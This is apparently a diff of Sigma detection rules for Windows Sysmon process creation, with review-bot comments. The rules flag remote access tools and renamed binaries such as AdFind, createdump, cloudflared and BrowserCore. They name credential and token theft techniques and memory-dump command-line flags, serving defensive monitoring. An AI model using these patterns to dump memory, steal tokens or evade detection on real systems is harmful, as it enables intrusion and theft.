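Review bot: The `Imphash:` and `Hashes|contains: IMPHASH=` alternatives in the second netsupport_susp_exec hunk are only populated when the Sysmon configuration includes IMPHASH in its hash algorithms, which is not the default; the rule is silent about that, so an operator whose Sysmon logs SHA256 only will have two of the five alternatives dead and may over-estimate the coverage. A short comment above the selection would make the dependency visible, e.g. `# Note: The Imphash/Hashes alternatives require Sysmon to be configured to record IMPHASH`. Separately, `OriginalFileName|contains: client32.exe` is broader than the exact `OriginalFileName:` form used by the sibling netsupport rule in this commit; if the substring match is intentional, a comment saying why would help, otherwise `- OriginalFileName: client32.exe` aligns the two rules.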
@@ -1,8 +1,7 @@ title: Remote Access Tool - RURAT Execution From Unusual Location id: e01fa958-6893-41d4-ae03-182477c5e77d status: test -description: Detects execution of Remote Utilities RAT (RURAT) from an unusual location - (outside of 'C:\Program Files') +description: Detects execution of Remote Utilities RAT (RURAT) from an unusual location (outside of 'C:\Program Files') references: - https://redcanary.com/blog/misbehaving-rats/ author: Nasreddine Bencherchali (Nextron Systems) @@ -19,10 +18,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: - - \rutserv.exe - - \rfusclient.exe - - Product: Remote Utilities + - Image|endswith: + - \rutserv.exe + - \rfusclient.exe + - Product: Remote Utilities filter: Image|startswith: - C:\Program Files\Remote Utilities diff --git a/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_screenconnect.yml b/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_screenconnect.yml index 55b27fe63..02c41ce04 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_screenconnect.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_screenconnect.yml 
@@ -1,18 +1,10 @@ title: Remote Access Tool - ScreenConnect Execution id: 57bff678-25d1-4d6c-8211-8ca106d12053 status: test -description: 'An adversary may use legitimate desktop support and remote access software, - such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive - command and control channel to target systems within networks. - - These services are commonly used as legitimate technical support software, and - may be allowed by application control within a target environment. - - Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared - with other legitimate software commonly used by adversaries. (Citation: Symantec - Living off the Land) - - ' +description: | + An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. + These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. + Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-5---screenconnect-application-download-and-install-on-windows author: frack113 @@ -30,9 +22,9 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Description: ScreenConnect Service - - Product: ScreenConnect - - Company: ScreenConnect Software + - Description: ScreenConnect Service + - Product: ScreenConnect + - Company: ScreenConnect Software condition: process_creation and selection falsepositives: - Legitimate usage of the tool 
diff --git a/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_screenconnect_access.yml b/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_screenconnect_access.yml index 52c2ede7f..7502f7cdf 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_screenconnect_access.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_screenconnect_access.yml @@ -1,8 +1,7 @@ title: Remote Access Tool - ScreenConnect Suspicious Execution id: 75bfe6e6-cd8e-429e-91d3-03921e1d7962 status: test -description: Detects ScreenConnect program starts that establish a remote access to - that system (not meeting, not remote support) +description: Detects ScreenConnect program starts that establish a remote access to that system (not meeting, not remote support) references: - https://www.anomali.com/blog/probable-iranian-cyber-actors-static-kitten-conducting-cyberespionage-campaign-targeting-uae-and-kuwait-government-agencies author: Florian Roth (Nextron Systems) @@ -20,7 +19,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - e=Access& - y=Guest& - '&p=' diff --git a/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_screenconnect_anomaly.yml b/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_screenconnect_anomaly.yml index 9f7ab46f1..8ce7ae7fc 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_screenconnect_anomaly.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_screenconnect_anomaly.yml 
@@ -1,8 +1,7 @@ title: Remote Access Tool - ScreenConnect Backstage Mode Anomaly id: 7b582f1a-b318-4c6a-bf4e-66fe49bf55a5 status: test -description: Detects suspicious sub processes started by the ScreenConnect client - service, which indicates the use of the so-called Backstage mode +description: Detects suspicious sub processes started by the ScreenConnect client service, which indicates the use of the so-called Backstage mode references: - https://www.mandiant.com/resources/telegram-malware-iranian-espionage - https://docs.connectwise.com/ConnectWise_Control_Documentation/Get_started/Host_client/View_menu/Backstage_mode diff --git a/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_screenconnect_remote_exec.yml b/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_screenconnect_remote_exec.yml index 79d887aa7..70c70e65a 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_screenconnect_remote_exec.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_screenconnect_remote_exec.yml @@ -20,13 +20,14 @@ detection: selection_parent: ParentImage|endswith: \ScreenConnect.ClientService.exe selection_img: - - Image|endswith: \cmd.exe - - OriginalFileName: Cmd.Exe + - Image|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe selection_cli: - CommandLine|contains: \TEMP\ScreenConnect\ + # Example: + # CommandLine: "cmd.exe" /c "C:\Windows\TEMP\ScreenConnect\23.6.8.8644\3c41d689-bbf5-4216-b2f4-ba8fd6192c25run.cmd" + CommandLine|contains: \TEMP\ScreenConnect\ condition: process_creation and (all of selection_*) falsepositives: - - Legitimate use of ScreenConnect. Disable this rule if ScreenConnect is heavily - used. + - Legitimate use of ScreenConnect. Disable this rule if ScreenConnect is heavily used. level: medium ruletype: Sigma 
diff --git a/sigma/sysmon/process_creation/proc_creation_win_remote_time_discovery.yml b/sigma/sysmon/process_creation/proc_creation_win_remote_time_discovery.yml index 66749424b..124e9c6cf 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_remote_time_discovery.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_remote_time_discovery.yml @@ -1,9 +1,7 @@ title: Discovery of a System Time id: b243b280-65fe-48df-ba07-6ddea7646427 status: test -description: Identifies use of various commands to query a systems time. This technique - may be used before executing a scheduled task or to discover the time zone of - a target system. +description: Identifies use of various commands to query a systems time. This technique may be used before executing a scheduled task or to discover the time zone of a target system. references: - https://eqllib.readthedocs.io/en/latest/analytics/fcdb99c2-ac3c-4bde-b664-4b336329bed2.html - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1124/T1124.md @@ -25,13 +23,12 @@ detection: Image|endswith: - \net.exe - \net1.exe - CommandLine|contains: time + CommandLine|contains: time selection_w32tm: Image|endswith: \w32tm.exe - CommandLine|contains: tz + CommandLine|contains: tz condition: process_creation and (1 of selection_*) falsepositives: - - Legitimate use of the system utilities to discover system time for legitimate - reason + - Legitimate use of the system utilities to discover system time for legitimate reason level: low ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_renamed_adfind.yml b/sigma/sysmon/process_creation/proc_creation_win_renamed_adfind.yml index 6fd8d68fd..f4929a3a1 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_renamed_adfind.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_renamed_adfind.yml 
@@ -1,9 +1,7 @@ title: Renamed AdFind Execution id: df55196f-f105-44d3-a675-e9dfb6cc2f2b status: test -description: Detects the use of a renamed Adfind.exe. AdFind continues to be seen - across majority of breaches. It is used to domain trust discovery to plan out - subsequent steps in the attack chain. +description: Detects the use of a renamed Adfind.exe. AdFind continues to be seen across majority of breaches. It is used to domain trust discovery to plan out subsequent steps in the attack chain. references: - https://www.joeware.net/freetools/tools/adfind/ - https://thedfirreport.com/2020/05/08/adfind-recon/ @@ -29,7 +27,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_1: - CommandLine|contains: + CommandLine|contains: - domainlist - trustdmp - dcmodes @@ -50,12 +48,12 @@ detection: - computers_active - computers_pwdnotreqd selection_2: - - Imphash: - - bca5675746d13a1f246e2da3c2217492 - - 53e117a96057eaf19c41380d0e87f1c2 - - Hashes|contains: - - IMPHASH=BCA5675746D13A1F246E2DA3C2217492 - - IMPHASH=53E117A96057EAF19C41380D0E87F1C2 + - Imphash: + - bca5675746d13a1f246e2da3c2217492 + - 53e117a96057eaf19c41380d0e87f1c2 + - Hashes|contains: + - IMPHASH=BCA5675746D13A1F246E2DA3C2217492 + - IMPHASH=53E117A96057EAF19C41380D0E87F1C2 selection_3: OriginalFileName: AdFind.exe filter: diff --git a/sigma/sysmon/process_creation/proc_creation_win_renamed_autohotkey.yml b/sigma/sysmon/process_creation/proc_creation_win_renamed_autohotkey.yml index c269d93bc..41ea2dfa1 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_renamed_autohotkey.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_renamed_autohotkey.yml 
@@ -1,8 +1,7 @@ title: Renamed AutoHotkey.EXE Execution id: 0f16d9cf-0616-45c8-8fad-becc11b5a41c status: test -description: Detects execution of a renamed autohotkey.exe binary based on PE metadata - fields +description: Detects execution of a renamed autohotkey.exe binary based on PE metadata fields references: - https://www.autohotkey.com/download/ - https://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/ @@ -19,25 +18,25 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Product|contains: AutoHotkey - - Description|contains: AutoHotkey - - OriginalFileName: - - AutoHotkey.exe - - AutoHotkey.rc + - Product|contains: AutoHotkey + - Description|contains: AutoHotkey + - OriginalFileName: + - AutoHotkey.exe + - AutoHotkey.rc filter: - - Image|endswith: - - \AutoHotkey.exe - - \AutoHotkey32.exe - - \AutoHotkey32_UIA.exe - - \AutoHotkey64.exe - - \AutoHotkey64_UIA.exe - - \AutoHotkeyA32.exe - - \AutoHotkeyA32_UIA.exe - - \AutoHotkeyU32.exe - - \AutoHotkeyU32_UIA.exe - - \AutoHotkeyU64.exe - - \AutoHotkeyU64_UIA.exe - - Image|contains: \AutoHotkey + - Image|endswith: + - \AutoHotkey.exe + - \AutoHotkey32.exe + - \AutoHotkey32_UIA.exe + - \AutoHotkey64.exe + - \AutoHotkey64_UIA.exe + - \AutoHotkeyA32.exe + - \AutoHotkeyA32_UIA.exe + - \AutoHotkeyU32.exe + - \AutoHotkeyU32_UIA.exe + - \AutoHotkeyU64.exe + - \AutoHotkeyU64_UIA.exe + - Image|contains: \AutoHotkey condition: process_creation and (selection and not filter) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_renamed_autoit.yml b/sigma/sysmon/process_creation/proc_creation_win_renamed_autoit.yml index 5ca275fd4..1b681f476 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_renamed_autoit.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_renamed_autoit.yml 
@@ -1,15 +1,10 @@ title: Renamed AutoIt Execution id: f4264e47-f522-4c38-a420-04525d5b880f status: experimental -description: 'Detects the execution of a renamed AutoIt2.exe or AutoIt3.exe. - - AutoIt is a scripting language and automation tool for Windows systems. While - primarily used for legitimate automation tasks, it can be misused in cyber attacks. - - Attackers can leverage AutoIt to create and distribute malware, including keyloggers, - spyware, and botnets. A renamed AutoIt executable is particularly suspicious. - - ' +description: | + Detects the execution of a renamed AutoIt2.exe or AutoIt3.exe. + AutoIt is a scripting language and automation tool for Windows systems. While primarily used for legitimate automation tasks, it can be misused in cyber attacks. + Attackers can leverage AutoIt to create and distribute malware, including keyloggers, spyware, and botnets. A renamed AutoIt executable is particularly suspicious. references: - https://twitter.com/malmoeb/status/1665463817130725378?s=12&t=C0_T_re0wRP_NfKa27Xw9w - https://www.autoitscript.com/site/ 
@@ -28,18 +23,18 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_1: - CommandLine|contains: + CommandLine|contains: - ' /AutoIt3ExecuteScript' - ' /ErrorStdOut' selection_2: - - Imphash: - - fdc554b3a8683918d731685855683ddf - - cd30a61b60b3d60cecdb034c8c83c290 - - f8a00c72f2d667d2edbb234d0c0ae000 - - Hashes|contains: - - IMPHASH=FDC554B3A8683918D731685855683DDF - - IMPHASH=CD30A61B60B3D60CECDB034C8C83C290 - - IMPHASH=F8A00C72F2D667D2EDBB234D0C0AE000 + - Imphash: + - fdc554b3a8683918d731685855683ddf # AutoIt v2 - doesn't cover all binaries + - cd30a61b60b3d60cecdb034c8c83c290 # AutoIt v2 - doesn't cover all binaries + - f8a00c72f2d667d2edbb234d0c0ae000 # AutoIt v3 - doesn't cover all binaries + - Hashes|contains: + - IMPHASH=FDC554B3A8683918D731685855683DDF # AutoIt v2 - doesn't cover all binaries + - IMPHASH=CD30A61B60B3D60CECDB034C8C83C290 # AutoIt v2 - doesn't cover all binaries + - IMPHASH=F8A00C72F2D667D2EDBB234D0C0AE000 # AutoIt v3 - doesn't cover all binaries selection_3: OriginalFileName: - AutoIt3.exe diff --git a/sigma/sysmon/process_creation/proc_creation_win_renamed_binary.yml b/sigma/sysmon/process_creation/proc_creation_win_renamed_binary.yml index f2cbe5299..f67b2ef73 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_renamed_binary.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_renamed_binary.yml 
@@ -1,17 +1,15 @@ title: Potential Defense Evasion Via Binary Rename id: 36480ae1-a1cb-4eaa-a0d6-29801d7e9142 related: - - id: 0ba1da6d-b6ce-4366-828c-18826c9de23e - type: similar + - id: 0ba1da6d-b6ce-4366-828c-18826c9de23e + type: similar status: test -description: Detects the execution of a renamed binary often used by attackers or - malware leveraging new Sysmon OriginalFileName datapoint. +description: Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint. references: - https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html - https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html - https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1036.003/T1036.003.md#atomic-test-1---masquerading-as-windows-lsass-process -author: Matthew Green @mgreen27, Ecco, James Pemberton @4A616D6573, oscd.community, - Andreas Hunkeler (@Karneades) +author: Matthew Green @mgreen27, Ecco, James Pemberton @4A616D6573, oscd.community, Andreas Hunkeler (@Karneades) date: 2019/06/15 modified: 2023/01/18 tags: @@ -49,7 +47,6 @@ detection: - \InstallUtil.exe condition: process_creation and (selection and not filter) falsepositives: - - Custom applications use renamed binaries adding slight change to binary name. - Typically this is easy to spot and add to whitelist + - Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_renamed_binary_highly_relevant.yml b/sigma/sysmon/process_creation/proc_creation_win_renamed_binary_highly_relevant.yml index 3f2290822..034089280 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_renamed_binary_highly_relevant.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_renamed_binary_highly_relevant.yml 
@@ -1,19 +1,18 @@ title: Potential Defense Evasion Via Rename Of Highly Relevant Binaries id: 0ba1da6d-b6ce-4366-828c-18826c9de23e related: - - id: 36480ae1-a1cb-4eaa-a0d6-29801d7e9142 - type: similar - - id: 2569ed8c-1147-498a-9b8c-2ad3656b10ed - type: derived - - id: a7a7e0e5-1d57-49df-9c58-9fe5bc0346a2 - type: obsoletes - - id: d178a2d7-129a-4ba4-8ee6-d6e1fecd5d20 - type: obsoletes - - id: d4d2574f-ac17-4d9e-b986-aeeae0dc8fe2 - type: obsoletes + - id: 36480ae1-a1cb-4eaa-a0d6-29801d7e9142 + type: similar + - id: 2569ed8c-1147-498a-9b8c-2ad3656b10ed # Renamed Rundll32 Specific + type: derived + - id: a7a7e0e5-1d57-49df-9c58-9fe5bc0346a2 # Renamed PsExec + type: obsoletes + - id: d178a2d7-129a-4ba4-8ee6-d6e1fecd5d20 # Renamed PowerShell + type: obsoletes + - id: d4d2574f-ac17-4d9e-b986-aeeae0dc8fe2 # Renamed Rundll32 + type: obsoletes status: test -description: Detects the execution of a renamed binary often used by attackers or - malware leveraging new Sysmon OriginalFileName datapoint. +description: Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint. references: - https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html - https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html 
@@ -36,29 +35,29 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Description: Execute processes remotely - - Product: Sysinternals PsExec - - Description|startswith: - - Windows PowerShell - - pwsh - - OriginalFileName: - - certutil.exe - - cmstp.exe - - cscript.exe - - mshta.exe - - msiexec.exe - - powershell_ise.exe - - powershell.exe - - psexec.c - - psexec.exe - - psexesvc.exe - - pwsh.dll - - reg.exe - - regsvr32.exe - - rundll32.exe - - WerMgr - - wmic.exe - - wscript.exe + - Description: Execute processes remotely + - Product: Sysinternals PsExec + - Description|startswith: + - Windows PowerShell + - pwsh + - OriginalFileName: + - certutil.exe + - cmstp.exe + - cscript.exe + - mshta.exe + - msiexec.exe + - powershell_ise.exe + - powershell.exe + - psexec.c # old versions of psexec (2016 seen) + - psexec.exe + - psexesvc.exe + - pwsh.dll + - reg.exe + - regsvr32.exe + - rundll32.exe + - WerMgr + - wmic.exe + - wscript.exe filter: Image|endswith: - \certutil.exe @@ -80,9 +79,7 @@ detection: - \wscript.exe condition: process_creation and (selection and not filter) falsepositives: - - Custom applications use renamed binaries adding slight change to binary name. - Typically this is easy to spot and add to whitelist - - PsExec installed via Windows Store doesn't contain original filename field (False - negative) + - Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist + - PsExec installed via Windows Store doesn't contain original filename field (False negative) level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_renamed_browsercore.yml b/sigma/sysmon/process_creation/proc_creation_win_renamed_browsercore.yml index 65d04b747..9fd4733f6 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_renamed_browsercore.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_renamed_browsercore.yml 
@@ -1,8 +1,7 @@ title: Renamed BrowserCore.EXE Execution id: 8a4519e8-e64a-40b6-ae85-ba8ad2177559 status: test -description: Detects process creation with a renamed BrowserCore.exe (used to extract - Azure tokens) +description: Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens) references: - https://twitter.com/mariuszbit/status/1531631015139102720 author: Max Altgelt (Nextron Systems) diff --git a/sigma/sysmon/process_creation/proc_creation_win_renamed_cloudflared.yml b/sigma/sysmon/process_creation/proc_creation_win_renamed_cloudflared.yml index 99f6ec451..fd4697320 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_renamed_cloudflared.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_renamed_cloudflared.yml @@ -22,23 +22,23 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_cleanup: - CommandLine|contains|all: + CommandLine|contains|all: - ' tunnel ' - 'cleanup ' - CommandLine|contains: + CommandLine|contains: - '-config ' - '-connector-id ' selection_tunnel: - CommandLine|contains|all: + CommandLine|contains|all: - ' tunnel ' - ' run ' - CommandLine|contains: + CommandLine|contains: - '-config ' - '-credentials-contents ' - '-credentials-file ' - '-token ' selection_accountless: - CommandLine|contains|all: + CommandLine|contains|all: - -url - tunnel selection_hashes: diff --git a/sigma/sysmon/process_creation/proc_creation_win_renamed_createdump.yml b/sigma/sysmon/process_creation/proc_creation_win_renamed_createdump.yml index 97471381f..b259df344 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_renamed_createdump.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_renamed_createdump.yml 
@@ -1,11 +1,10 @@ title: Renamed CreateDump Utility Execution id: 1a1ed54a-2ba4-4221-94d5-01dee560d71e related: - - id: 515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48 - type: similar + - id: 515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48 + type: similar status: test -description: Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to - dump process memory +description: Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory references: - https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/ - https://twitter.com/bopin2020/status/1366400799199272960 @@ -27,14 +26,14 @@ detection: selection_pe: OriginalFileName: FX_VER_INTERNALNAME_STR selection_cli: - - CommandLine|contains|all: - - ' -u ' - - ' -f ' - - .dmp - - CommandLine|contains|all: - - ' --full ' - - ' --name ' - - .dmp + - CommandLine|contains|all: + - ' -u ' # Short version of '--full' + - ' -f ' # Short version of '--name' + - .dmp + - CommandLine|contains|all: + - ' --full ' # Short version of '--full' + - ' --name ' # Short version of '--name' + - .dmp filter: Image|endswith: \createdump.exe condition: process_creation and (1 of selection_* and not filter) diff --git a/sigma/sysmon/process_creation/proc_creation_win_renamed_curl.yml b/sigma/sysmon/process_creation/proc_creation_win_renamed_curl.yml index d2477ddc8..9ef5fe327 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_renamed_curl.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_renamed_curl.yml @@ -1,8 +1,7 @@ title: Renamed CURL.EXE Execution id: 7530cd3d-7671-43e3-b209-976966f6ea48 status: experimental -description: Detects the execution of a renamed "CURL.exe" binary based on the PE - metadata fields +description: Detects the execution of a renamed "CURL.exe" binary based on the PE metadata fields references: - https://twitter.com/Kostastsale/status/1700965142828290260 author: X__Junior (Nextron Systems) 
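Review bot: The comments added to the second `selection_cli` alternative in the createdump hunk are wrong: `' --full '` and `' --name '` are each annotated as "Short version of" themselves, which looks like a copy-paste of the comments on the `-u`/`-f` lines above. Since the hunk's own comments on the first alternative state that `-u` is the short form of `--full` and `-f` the short form of `--name`, the long-form lines should say the inverse, e.g. `- ' --full ' # Long form of '-u'` and `- ' --name ' # Long form of '-f'`. As written, an analyst tuning this rule could read the comment as implying there is yet another spelling to cover, so it is worth correcting before the misleading annotation propagates to the other backends' copies of this rule.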
@@ -22,8 +21,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - OriginalFileName: curl.exe - - Description: The curl executable + - OriginalFileName: curl.exe + - Description: The curl executable filter_main_img: Image|contains: \curl condition: process_creation and (selection and not 1 of filter_main_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_renamed_dctask64.yml b/sigma/sysmon/process_creation/proc_creation_win_renamed_dctask64.yml index fb7214d4e..96604d07a 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_renamed_dctask64.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_renamed_dctask64.yml @@ -1,8 +1,7 @@ title: Renamed ZOHO Dctask64 Execution id: 340a090b-c4e9-412e-bb36-b4b16fe96f9b status: test -description: Detects a renamed dctask64.exe used for process injection, command execution, - process creation with a signed binary by ZOHO Corporation +description: Detects a renamed dctask64.exe used for process injection, command execution, process creation with a signed binary by ZOHO Corporation references: - https://twitter.com/gN3mes1s/status/1222088214581825540 - https://twitter.com/gN3mes1s/status/1222095963789111296 diff --git a/sigma/sysmon/process_creation/proc_creation_win_renamed_ftp.yml b/sigma/sysmon/process_creation/proc_creation_win_renamed_ftp.yml index 8dac42201..df042e868 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_renamed_ftp.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_renamed_ftp.yml @@ -1,8 +1,7 @@ title: Renamed FTP.EXE Execution id: 277a4393-446c-449a-b0ed-7fdc7795244c status: test -description: Detects the execution of a renamed "ftp.exe" binary based on the PE metadata - fields +description: Detects the execution of a renamed "ftp.exe" binary based on the PE metadata fields references: - https://lolbas-project.github.io/lolbas/Binaries/Ftp/ author: Victor Sergeev, oscd.community 
diff --git a/sigma/sysmon/process_creation/proc_creation_win_renamed_gpg4win.yml b/sigma/sysmon/process_creation/proc_creation_win_renamed_gpg4win.yml index b8c519f0c..d76e0524a 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_renamed_gpg4win.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_renamed_gpg4win.yml @@ -1,8 +1,7 @@ title: Renamed Gpg.EXE Execution id: ec0722a3-eb5c-4a56-8ab2-bf6f20708592 status: experimental -description: Detects the execution of a renamed "gpg.exe". Often used by ransomware - and loaders to decrypt/encrypt data. +description: Detects the execution of a renamed "gpg.exe". Often used by ransomware and loaders to decrypt/encrypt data. references: - https://securelist.com/locked-out/68960/ author: Nasreddine Bencherchali (Nextron Systems), frack113 diff --git a/sigma/sysmon/process_creation/proc_creation_win_renamed_jusched.yml b/sigma/sysmon/process_creation/proc_creation_win_renamed_jusched.yml index eb858ffd9..6fb7539a7 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_renamed_jusched.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_renamed_jusched.yml @@ -1,8 +1,7 @@ title: Renamed Jusched.EXE Execution id: edd8a48c-1b9f-4ba1-83aa-490338cd1ccb status: test -description: Detects the execution of a renamed "jusched.exe" as seen used by the - cobalt group +description: Detects the execution of a renamed "jusched.exe" as seen used by the cobalt group references: - https://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf author: Markus Neis, Swisscom diff --git a/sigma/sysmon/process_creation/proc_creation_win_renamed_mavinject.yml b/sigma/sysmon/process_creation/proc_creation_win_renamed_mavinject.yml index 602ddf86a..d5d05d573 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_renamed_mavinject.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_renamed_mavinject.yml 
@@ -1,15 +1,14 @@ title: Renamed Mavinject.EXE Execution id: e6474a1b-5390-49cd-ab41-8d88655f7394 status: test -description: Detects the execution of a renamed version of the "Mavinject" process. - Which can be abused to perform process injection using the "/INJECTRUNNING" flag +description: Detects the execution of a renamed version of the "Mavinject" process. Which can be abused to perform process injection using the "/INJECTRUNNING" flag references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md - https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e - https://twitter.com/gN3mes1s/status/941315826107510784 - https://reaqta.com/2017/12/mavinject-microsoft-injector/ - - https://twitter.com/Hexacorn/status/776122138063409152 + - https://twitter.com/Hexacorn/status/776122138063409152 # Deleted tweet - https://github.com/SigmaHQ/sigma/issues/3742 - https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection author: frack113, Florian Roth diff --git a/sigma/sysmon/process_creation/proc_creation_win_renamed_megasync.yml b/sigma/sysmon/process_creation/proc_creation_win_renamed_megasync.yml index 22c6e6046..bb3407ee7 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_renamed_megasync.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_renamed_megasync.yml 
@@ -1,8 +1,7 @@ title: Renamed MegaSync Execution id: 643bdcac-8b82-49f4-9fd9-25a90b929f3b status: test -description: Detects the execution of a renamed MegaSync.exe as seen used by ransomware - families like Nefilim, Sodinokibi, Pysa, and Conti. +description: Detects the execution of a renamed MegaSync.exe as seen used by ransomware families like Nefilim, Sodinokibi, Pysa, and Conti. references: - https://redcanary.com/blog/rclone-mega-extortion/ author: Sittikorn S diff --git a/sigma/sysmon/process_creation/proc_creation_win_renamed_netsupport_rat.yml b/sigma/sysmon/process_creation/proc_creation_win_renamed_netsupport_rat.yml index 8c73677ad..e280a4706 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_renamed_netsupport_rat.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_renamed_netsupport_rat.yml @@ -1,8 +1,7 @@ title: Renamed NetSupport RAT Execution id: 0afbd410-de03-4078-8491-f132303cb67d status: test -description: Detects the execution of a renamed "client32.exe" (NetSupport RAT) via - Imphash, Product and OriginalFileName strings +description: Detects the execution of a renamed "client32.exe" (NetSupport RAT) via Imphash, Product and OriginalFileName strings references: - https://redcanary.com/blog/misbehaving-rats/ author: Nasreddine Bencherchali (Nextron Systems) @@ -19,10 +18,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Product|contains: NetSupport Remote Control - - OriginalFileName|contains: client32.exe - - Imphash: a9d50692e95b79723f3e76fcf70d023e - - Hashes|contains: IMPHASH=A9D50692E95B79723F3E76FCF70D023E + - Product|contains: NetSupport Remote Control + - OriginalFileName|contains: client32.exe + - Imphash: a9d50692e95b79723f3e76fcf70d023e + - Hashes|contains: IMPHASH=A9D50692E95B79723F3E76FCF70D023E filter: Image|endswith: \client32.exe condition: process_creation and (selection and not filter) 
